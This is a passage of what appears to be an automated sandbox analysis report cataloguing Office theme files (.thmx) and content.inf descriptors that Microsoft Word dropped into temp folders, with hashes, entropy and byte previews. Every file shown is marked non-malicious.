                                                                                                                                                        Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8274.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.5323495192404475
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                        SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                        SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                        SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD82E4.tmp\Berlin.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):976001
                                                                                                                                                        Entropy (8bit):7.791956689344336
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD82E4.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.5270134268591966
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                        SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                        SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                        SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD84CB.tmp\Gallery.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1091485
                                                                                                                                                        Entropy (8bit):7.906659368807194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                        MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD84CB.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.5301133500353727
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                        SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                        SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                        SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD84EB.tmp\Savon.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1204049
                                                                                                                                                        Entropy (8bit):7.92476783994848
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD84EB.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5364757859412563
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                        SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                                        SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                        SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD854B.tmp\Circuit.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1463634
                                                                                                                                                        Entropy (8bit):7.898382456989258
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD854B.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.5286004619027067
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                        SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                                        SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                        SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD86B5.tmp\Droplet.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1750795
                                                                                                                                                        Entropy (8bit):7.892395931401988
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                        MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD86B5.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.528155916440219
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                        SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                        SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                        SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8947.tmp\Slate.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2357051
                                                                                                                                                        Entropy (8bit):7.929430745829162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8947.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.516423078177173
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                        SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                        SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                        SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD89F5.tmp\Damask.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2218943
                                                                                                                                                        Entropy (8bit):7.942378408801199
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD89F5.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.544065206514744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                        SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                        SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
